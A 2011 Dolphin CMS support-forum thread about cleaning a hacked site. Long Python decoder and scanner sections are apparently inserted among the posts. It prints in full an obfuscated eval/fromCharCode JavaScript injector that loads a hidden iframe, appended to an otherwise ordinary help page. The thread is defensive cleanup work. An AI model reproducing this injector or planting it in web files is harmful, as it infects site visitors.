Google found MALWARE

My site has been hacked and I am trying to find help. Google found malware and gave me the list of pages infected:

Problematic URLs Last checked
/ - Details 10/30/11
/index.php - Details 10/30/11
/m/files/tags - Details 10/30/11
/m/photos/ - Details 10/30/11
/m/chat/home/ - Details 10/30/11
/m/feedback/index/ - Details 10/30/11
/m/news/archive/ - Details 10/30/11
/m/news/popular/ - Details 10/30/11
/m/photos/view/Aeropurto-El-Salvador-de-Noche - Details 10/30/11
/m/photos/view/Inim-logo - Details 10/30/11
/m/photos/view/Mural-en-el-aeropuerto-Monsenor-Romero-2011-10-14-10 - Details 10/30/11
/m/photos/view/Mural-en-el-aeropuerto-Monsenor-Romero-2011-10-14-15 - Details 10/30/11
/m/photos/view/Mural-en-el-aeropuerto-Monsenor-Romero-2011-10-14-6 - Details 10/30/11
/m/photos/view/Mural-en-el-aeropuerto-Monsenor-Romero-2011-10-14-7 - Details 10/30/11
/m/videos/browse/ - Details 10/30/11
/m/videos/browse/featured - Details 10/30/11
/m/videos/view/Buenas-Epocas-de-El-Salvador-Crei-flv - Details 10/30/11
/m/videos/view/Carnaval-de-San-Miguel-flv - Details 10/30/11
/m/videos/view/INIM-Presentacion-en-Aniversario-LISAM-2011-2011-10-15 - Details 10/30/11
/m/videos/view/PAQUITO-PALAVICCINI-Y-SU-ORQUESTA-INTERNACIONAL-POLIO-Ensalada-a-la-palaviccini-PARTE1-2011-10-14 - Details 10/30/11
/m/photos/browse/tag/profile+photos - Details

and here is the script found:

<script>Object.prototype.qwe=function(){return String;};Object.prototype.asd='e';var s="";try{{}['qwtqwt']();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof{}.asd.vfr==='undefined')c=2;e=eval;m=[4.5*c,18/c,52.5*c,204/c,16*c,80/c,50*c,222/c,49.5*c,234/c,54.5*c,202/c,55*c,232/c,23*c,206/c,50.5*c,232/c,34.5*c,216/c,50.5*c,218/c,50.5*c,220/c,58*c,230/c,33*c,242/c,42*c,194/c,51.5*c,156/c,48.5*c,218/c,50.5*c,80/c,19.5*c,196/c,55.5*c,200/c,60.5*c,78/c,20.5*c,182/c,24*c,186/c,20.5*c,246/c,4.5*c,18/c,4.5*c,210/c,51*c,228/c,48.5*c,218/c,50.5*c,228/c,20*c,82/c,29.5*c,18/c,4.5*c,250/c,16*c,202/c,54*c,230/c,50.5*c,64/c,61.5*c,18/c,4.5*c,18/c,50*c,222/c,49.5*c,234/c,54.5*c,202/c,55*c,232/c,23*c,238/c,57*c,210/c,58*c,202/c,20*c,68/c,30*c,210/c,51*c,228/c,48.5*c,218/c,50.5*c,64/c,57.5*c,228/c,49.5*c,122/c,19.5*c,208/c,58*c,232/c,56*c,116/c,23.5*c,94/c,57*c,202/c,49*c,222/c,58*c,230/c,58*c,194/c,58*c,92/c,49.5*c,222/c,54.5*c,94/c,58*c,202/c,54.5*c,224/c,23.5*c,230/c,58*c,194/c,58*c,92/

I don't know if it's due to other people that I had given access to my site for help, or if it's my computer itself, or maybe some security issue with Dolphin 7.07. Anyway, checking the directory I can't find the /m file in the directory.

I have suspended this site in WHM so people do not get infected, hoping to get help here telling me where to start to clean it. Thanks

Quote · 31 Oct 2011
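The posted script hides its real payload as an array of arithmetic terms (`4.5*c`, `18/c`, ...) that the browser multiplies or divides by a constant, turns into characters with `String.fromCharCode`, and hands to `eval`; the constant is only assigned after a few browser-feature checks pass, so a naive sandbox that fails those checks decodes garbage. The decoder below is an added example (not code from the thread or from Dolphin) that recovers the string the browser would `eval` by doing the arithmetic in Python instead of executing anything. The `SAMPLE` string is constructed for this example: it is the wrapper of the second variant posted further down in this thread around the first 71 array elements exactly as they appear in the posted scripts, with the remainder of the array omitted. Running it on the complete second script from this thread (joined into one string) decodes the whole payload the same way.

```python
"""Decode the arithmetic-encoded payload of the posted script without running
it.  Added example; not code from the thread or from Dolphin."""
import re

# m=[ ... ] holds the payload; every element is <number>*<var> or <number>/<var>.
ARRAY_RE = re.compile(r"\bm\s*=\s*\[(.*?)\]", re.DOTALL)
TERM_RE = re.compile(r"^(\d+(?:\.\d+)?)([*/])([A-Za-z_]\w*)$")
# The variable is assigned a constant right before e=eval (c=2 and t=2 in the
# two posted variants); that assignment only runs if the browser checks pass.
FACTOR_RE = re.compile(r"\b([A-Za-z_]\w*)=(\d+);e=eval")


def decode_payload(script_text, factor=None):
    """Return the string the script would hand to eval(), computed with plain
    arithmetic.  factor overrides the constant read from '<var>=<n>;e=eval'."""
    if factor is None:
        hit = FACTOR_RE.search(script_text)
        if not hit:
            raise ValueError("no '<var>=<n>;e=eval' assignment found")
        factor = int(hit.group(2))
    arr = ARRAY_RE.search(script_text)
    if not arr:
        raise ValueError("no complete m=[...] array found (truncated paste?)")
    chars = []
    # Line breaks inside the array (as in a wrapped forum paste) are harmless.
    for term in arr.group(1).replace("\n", "").split(","):
        term = term.strip()
        if not term:
            continue  # tolerate a trailing comma
        t = TERM_RE.match(term)
        if not t:
            raise ValueError(f"unexpected array element: {term!r}")
        num, op = float(t.group(1)), t.group(2)
        code = num * factor if op == "*" else num / factor
        if code != int(code) or not 0 <= code < 0x110000:
            raise ValueError(f"{term!r} does not yield a character code")
        chars.append(chr(int(code)))
    return "".join(chars)


# Constructed sample: the wrapper of the second posted variant around the first
# 71 array elements exactly as they appear in the thread (the rest is omitted).
SAMPLE = (
    'var s="";try{new asd[0]}catch(q){if(q)r=1;c=String;}'
    "if(r&&document.createTextNode)t=2;e=eval;m=["
    "4.5*t,18/t,52.5*t,204/t,16*t,80/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,"
    "55*t,232/t,23*t,206/t,50.5*t,232/t,34.5*t,216/t,50.5*t,218/t,50.5*t,220/t,"
    "58*t,230/t,33*t,242/t,42*t,194/t,51.5*t,156/t,48.5*t,218/t,50.5*t,80/t,"
    "19.5*t,196/t,55.5*t,200/t,60.5*t,78/t,20.5*t,182/t,24*t,186/t,20.5*t,246/t,"
    "4.5*t,18/t,4.5*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,228/t,20*t,82/t,"
    "29.5*t,18/t,4.5*t,250/t,16*t,202/t,54*t,230/t,50.5*t,64/t,61.5*t"
    "];mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)"
    "s+=mm(e(\"m\"+\"[\"+\"i\"+']'));try{document.appendChild(null)}catch(q){e(s);}"
)

if __name__ == "__main__":
    print(repr(decode_payload(SAMPLE)))
```

The 71 elements above decode to `\t\tif (document.getElementsByTagName('body')[0]){\t\t\tiframer();\t\t} else {`, i.e. the start of a routine that injects an iframe once the page body exists. The first script posted above is cut off before its closing `]`, so `decode_payload` refuses it; either feed it the complete second variant, or close the array yourself and read only the prefix.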

/m is /module. Also, change all of your passwords for logins and check your local computer for malware and/or viruses.

Your hosting company might be able to assist you with this also.

Quote · 31 Oct 2011

Here's a blog/note I did about it:

http://www.boonex.com/n/fyi-on-malware-attacks

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
Quote · 31 Oct 2011

Most likely you are going to find that you have several files, index.php and index.html, that have been infected. The evil JavaScript has been injected (appended) to those files. 300+ was the last one we cleaned up.

What you have to do to clean that up is one of two things:

Assuming you have a backup that is clean (prior to infection), then you can restore that backup. If you don't have a clean backup that you can use, then you will need to clean each file that has been appended.

Download the entire site and use a good editor, e.g. Dreamweaver or Notepad++; open all the files and search and replace.

 

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
Quote · 31 Oct 2011

I found this file in the root directory and I noticed at the bottom (red) a script, but it's different from the one Google found. Should I remove it?

Thanks

<html>
<head>

<style type="text/css">

    .spec
    {
        float:left;
        width:80px;
        height:20px;
        position:relative;
        border: 1px solid silver;
        text-align : center;
    }

    .desc
    {
        float:left;
        width:360px;
        height:20px;
        position:relative;
        border: 1px solid silver;
    }

</style>

</head>

<body>

<div style="width:460px; position:relative;">
<h3><center>Do you want to change the Date Format for your site? It is possible, just follow the instructions.</h3>
</center><br>
<b>You need to switch some attributes.</b>
<br>
 1)To show a date in the Format: <b>Day.Month.YYYY</b>, input into the Short or Long Date Format <b>%d.%m.%Y</b>.
<br><br>
2)To show a date and time  - <b>Month/Day/Year Hours:Minutes:Seconds</b> input into the Long Date Format <b>%m/%d/%Y %H:%i:%s</b>.
<br><br>
3)To use PM or AM format for time input - <b>%I%p:%i:%s</b>. You will see time in this format <b>09am:43:12</b>.
<br><br>
4) you can use  different types of separators: <br><br>
<center>
<table border=1>
<tr >
    <td ><b>Separator</b></td>
    <td><b>Format</b></td>
    <td><b>Result</b></td>
</tr>
<tr align=center>
    <td>.</td>
    <td>Day.Month.YYYY</td>
    <td>%d.%m.%Y</td>

</tr>

<tr align=center>
    <td>/</td>
    <td>Month/Day/Year</td>
    <td>%m/%d/%Y</td>

</tr>
<tr align=center>
    <td>*</td>
    <td>Month*Day*Year</td>
    <td>%m*%d*%Y</td>

</tr>

<tr align=center>
    <td colspan=3 >some other separators:   -    :    ;    -- </b></td>

</tr>
</table>
</center>




<br>
<br>
<br>
<b>Use the list to form the date format on your liking.</b><br>

<br>
<div class="spec">Specifier</div>
<div class="desc">Description</div>

<div class="spec">%m</div>
<div class="desc">Month, numeric (01..12)</div>

<div class="spec">%w</div>
<div class="desc">Day of the week (0=Sunday..6=Saturday)</div>

<div class="spec">%d</div>
<div class="desc">Day of the month, numeric (00..31)</div>

<div class="spec">%Y</div>
<div class="desc">Year, numeric, 4 digits</div>

<div class="spec">%y</div>
<div class="desc">Year, numeric, 2 digits</div>

<div class="spec">%b</div>
<div class="desc">Abbreviated month name (Jan..Dec)</div>

<div class="spec">%H</div>
<div class="desc">Hour (00..23)</div>

<div class="spec">%I</div>
<div class="desc">Hour (01..12)</div>

<div class="spec">%p</div>
<div class="desc">AM or PM</div>

<div class="spec">%i</div>
<div class="desc">Minutes, numeric (00..59)</div>

<div class="spec">%s</div>
<div class="desc">Seconds (00..59)</div>
</div>

</body>
</html>
<script>var s="";try{new asd[0]}catch(q){if(q)r=1;c=String;}if(r&&document.createTextNode)t=2;e=eval;m=[4.5*t,18/t,52.5*t,204/t,16*t,80/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,206/t,50.5*t,232/t,34.5*t,216/t,50.5*t,218/t,50.5*t,220/t,58*t,230/t,33*t,242/t,42*t,194/t,51.5*t,156/t,48.5*t,218/t,50.5*t,80/t,19.5*t,196/t,55.5*t,200/t,60.5*t,78/t,20.5*t,182/t,24*t,186/t,20.5*t,246/t,4.5*t,18/t,4.5*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,228/t,20*t,82/t,29.5*t,18/t,4.5*t,250/t,16*t,202/t,54*t,230/t,50.5*t,64/t,61.5*t,18/t,4.5*t,18/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,238/t,57*t,210/t,58*t,202/t,20*t,68/t,30*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,64/t,57.5*t,228/t,49.5*t,122/t,19.5*t,208/t,58*t,232/t,56*t,116/t,23.5*t,94/t,51*t,210/t,49*t,202/t,57*t,194/t,57.5*t,232/t,48.5*t,232/t,23*t,198/t,55.5*t,218/t,23.5*t,232/t,50.5*t,218/t,56*t,94/t,57.5*t,232/t,48.5*t,232/t,23*t,224/t,52*t,224/t,19.5*t,64/t,59.5*t,210/t,50*t,232/t,52*t,122/t,19.5*t,98/t,24*t,78/t,16*t,208/t,50.5*t,210/t,51.5*t,208/t,58*t,122/t,19.5*t,98/t,24*t,78/t,16*t,230/t,58*t,242/t,54*t,202/t,30.5*t,78/t,59*t,210/t,57.5*t,210/t,49*t,210/t,54*t,210/t,58*t,242/t,29*t,208/t,52.5*t,
200/t,50*t,202/t,55*t,118/t,56*t,222/t,57.5*t,210/t,58*t,210/t,55.5*t,220/t,29*t,194/t,49*t,230/t,55.5*t,216/t,58.5*t,232/t,50.5*t,118/t,54*t,202/t,51*t,232/t,29*t,96/t,29.5*t,232/t,55.5*t,224/t,29*t,96/t,29.5*t,78/t,31*t,120/t,23.5*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,124/t,17*t,82/t,29.5*t,18/t,4.5*t,250/t,4.5*t,18/t,51*t,234/t,55*t,198/t,58*t,210/t,55.5*t,220/t,16*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,228/t,20*t,82/t,61.5*t,18/t,4.5*t,18/t,59*t,194/t,57*t,64/t,51*t,64/t,30.5*t,64/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,198/t,57*t,202/t,48.5*t,232/t,50.5*t,138/t,54*t,202/t,54.5*t,202/t,55*t,232/t,20*t,78/t,52.5*t,204/t,57*t,194/t,54.5*t,202/t,19.5*t,82/t,29.5*t,204/t,23*t,230/t,50.5*t,232/t,32.5*t,232/t,58*t,228/t,52.5*t,196/t,58.5*t,232/t,50.5*t,80/t,19.5*t,230/t,57*t,198/t,19.5*t,88/t,19.5*t,208/t,58*t,232/t,56*t,116/t,23.5*t,94/t,51*t,210/t,49*t,202/t,57*t,194/t,57.5*t,232/t,48.5*t,232/t,23*t,198/t,55.5*t,218/t,23.5*t,232/t,50.5*t,218/t,56*t,94/t,57.5*t,232/t,48.5*t,232/t,23*t,224/t,52*t,224/t,19.5*t,82/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,236/t,52.5*t,230/t,52.5*t,196/t,52.5*t,216/t,52.5*t,232/t,60.5*t,122/t,19.5*t,208/t,52.5*t,200/t,50*t,
202/t,55*t,78/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,224/t,55.5*t,230/t,52.5*t,232/t,52.5*t,222/t,55*t,122/t,19.5*t,194/t,49*t,230/t,55.5*t,216/t,58.5*t,232/t,50.5*t,78/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,216/t,50.5*t,204/t,58*t,122/t,19.5*t,96/t,19.5*t,118/t,51*t,92/t,57.5*t,232/t,60.5*t,216/t,50.5*t,92/t,58*t,222/t,56*t,122/t,19.5*t,96/t,19.5*t,118/t,51*t,92/t,57.5*t,202/t,58*t,130/t,58*t,232/t,57*t,210/t,49*t,234/t,58*t,202/t,20*t,78/t,59.5*t,210/t,50*t,232/t,52*t,78/t,22*t,78/t,24.5*t,96/t,19.5*t,82/t,29.5*t,204/t,23*t,230/t,50.5*t,232/t,32.5*t,232/t,58*t,228/t,52.5*t,196/t,58.5*t,232/t,50.5*t,80/t,19.5*t,208/t,50.5*t,210/t,51.5*t,208/t,58*t,78/t,22*t,78/t,24.5*t,96/t,19.5*t,82/t,29.5*t,18/t,4.5*t,18/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,206/t,50.5*t,232/t,34.5*t,216/t,50.5*t,218/t,50.5*t,220/t,58*t,230/t,33*t,242/t,42*t,194/t,51.5*t,156/t,48.5*t,218/t,50.5*t,80/t,19.5*t,196/t,55.5*t,200/t,60.5*t,78/t,20.5*t,182/t,24*t,186/t,23*t,194/t,56*t,224/t,50.5*t,220/t,50*t,134/t,52*t,210/t,54*t,200/t,20*t,204/t,20.5*t,118/t,4.5*t,18/t,62.5*t];mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.appendChild(null)}catch(q){e(s);}</script>
<!-- o --><!-- c -->

Quote · 31 Oct 2011

Well, as provided by Google, the list of compromised files has been provided as a shortlist. You would need to search across the entire site. It is my belief that every index.* has been infected. There are ~200 of those files.

Then once you clean those up, you have to have Google review the site again; then they will remove the warning, though even then it takes some time to propagate getting it removed. Also in your Google account (and you will need one in order to submit for review) there are some helpful tips on what needs to be done to clean the site.

So all in all it's quite a task to clean up.

The major obstacle is trying to identify how the site was compromised: who has been on your site, who have you shared your FTP credentials with?

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
Quote · 1 Nov 2011
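Both Terabyte replies above (download the site and search-and-replace; Google's list is only a shortlist, so search every file) describe the same procedure. The script below is an added example (not code from the thread, from Dolphin or from Terabyte) that does it against a downloaded copy of the site: it walks the tree, flags every file containing the injection's signature, and on request strips the appended `<script>...</script>` block while keeping a `.bak` copy of the original as evidence. The signature, an inline `<script>` whose body contains `e=eval;m=[`, is taken from the two scripts posted in this thread and nothing else; the set of scanned extensions and the sample site built by `demo()` are assumptions made for this example, and the sample's payload array is cut to three elements.

```python
"""Locate and strip the appended eval/fromCharCode script across a site dump.
Added example; not code from the thread, from Dolphin or from Terabyte."""
import re
import shutil
import tempfile
from pathlib import Path

# Signature of the injection shown in this thread: an inline <script> whose body
# contains `e=eval;m=[` (the eval alias followed by the numeric payload array).
# Lazy matching bounded by </script> keeps it from eating the rest of the file.
INJECTED_SCRIPT = re.compile(
    r"<script>(?:(?!</script>).)*?e=eval;m=\[(?:(?!</script>).)*?</script>[ \t]*\r?\n?",
    re.DOTALL,
)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".tpl", ".js"}  # assumption for this example


def find_injections(root):
    """Map each infected file path (str) under root to its number of hits."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="surrogateescape")
        n = len(INJECTED_SCRIPT.findall(text))
        if n:
            hits[str(path)] = n
    return hits


def clean_file(path, keep_backup=True):
    """Remove the injected script(s) from one file and return how many.
    The original is copied to <name>.bak first so the evidence survives for
    later analysis (decode it, see where the iframe pointed, check its mtime)."""
    p = Path(path)
    text = p.read_text(encoding="utf-8", errors="surrogateescape")
    cleaned, n = INJECTED_SCRIPT.subn("", text)
    if n:
        if keep_backup:
            shutil.copy2(p, p.with_name(p.name + ".bak"))
        p.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return n


def clean_tree(root, dry_run=True):
    """Dry run by default: report only.  With dry_run=False, strip the scripts
    and report the number removed per file."""
    hits = find_injections(root)
    if dry_run:
        return hits
    return {path: clean_file(path) for path in hits}


# Constructed sample (not the poster's files): the second posted variant with
# its payload array cut to three elements.
SAMPLE_INJECTION = (
    '<script>var s="";try{new asd[0]}catch(q){if(q)r=1;c=String;}'
    "if(r&&document.createTextNode)t=2;e=eval;m=[4.5*t,18/t,52.5*t];"
    "mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)"
    "s+=mm(e(\"m\"+\"[\"+\"i\"+']'));try{document.appendChild(null)}catch(q){e(s);}</script>"
)


def demo():
    """Build a constructed sample site in a temp dir, scan, clean, rescan."""
    root = Path(tempfile.mkdtemp())
    index = root / "index.php"
    index.write_text("<html><body>site</body></html>\n" + SAMPLE_INJECTION + "\n")
    (root / "modules").mkdir()
    (root / "modules" / "index.php").write_text("<?php echo 'clean'; ?>\n")
    (root / "logo.png").write_bytes(b"\x89PNG not scanned")
    reported = clean_tree(root)                # dry run: report only
    removed = clean_tree(root, dry_run=False)  # real cleanup with .bak copies
    return {
        "reported": sorted(Path(p).relative_to(root).as_posix() for p in reported),
        "removed": sum(removed.values()),
        "left": len(find_injections(root)),
        "backup_has_payload": "e=eval" in (root / "index.php.bak").read_text(),
        "page_body_kept": index.read_text() == "<html><body>site</body></html>\n",
    }


if __name__ == "__main__":
    print(demo())
```

Run the dry run first and compare its output with Google's list: files Google did not flag but the scanner does are the ones a page-by-page cleanup would miss. Cleaning files in place does nothing about how they got there; the `.bak` copies keep the original modification times, which is the first thing to line up against FTP and web server logs when working out the entry point.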

So far I only found 1 file, faq.php in the root directory, infected, and requested Google to remove the warning screen from my site, and they did, but I am still unable to determine the way the file was infected.

Quote · 2 Nov 2011

Well, there are a few ways to go about this, and most times it really isn't worth putting much effort into if you are on shared hosting.

But if you have given your FTP out to anybody to work on your site, then they could well be infected, your own machine could be infected, or the server itself could be compromised.

Changing your logins and keeping your environment as secure as you can is really all you can do. I will also send you a PM for a service that scans your site on a daily basis, to notify you if there are any security vulnerabilities or anything else going on with your site.

I will send that in a PM to you.

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
Quote · 2 Nov 2011

Is there a common denominator in all of this? Have all infected sites had work done by the same developer? This is really becoming a huge problem.

Quote · 2 Nov 2011

Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.